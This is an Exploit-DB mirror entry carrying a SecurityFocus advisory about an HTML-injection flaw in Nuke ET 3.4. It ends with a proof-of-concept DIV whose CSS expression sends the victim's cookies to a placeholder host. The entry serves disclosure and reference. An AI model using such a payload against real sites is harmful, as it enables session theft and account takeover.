exploit-db-mirror/exploits/php/webapps/31609.txt
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

10 lines
No EOL
676 B
Text

source: https://www.securityfocus.com/bid/28614/info
Nuke ET is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied input data. Attackers will likely require access to a user account to perform attacks.
Exploiting this issue may allow an attacker to execute HTML and script code in the context of the affected site, to steal cookie-based authentication credentials, or to control how the site is rendered to the user; other attacks are also possible.
Nuke ET 3.4 is vulnerable; other versions may also be affected.
<DIV
STYLE="width:expression(document.location='http://www.example.com/nuke/poc.php?cookie='+document.cookie);">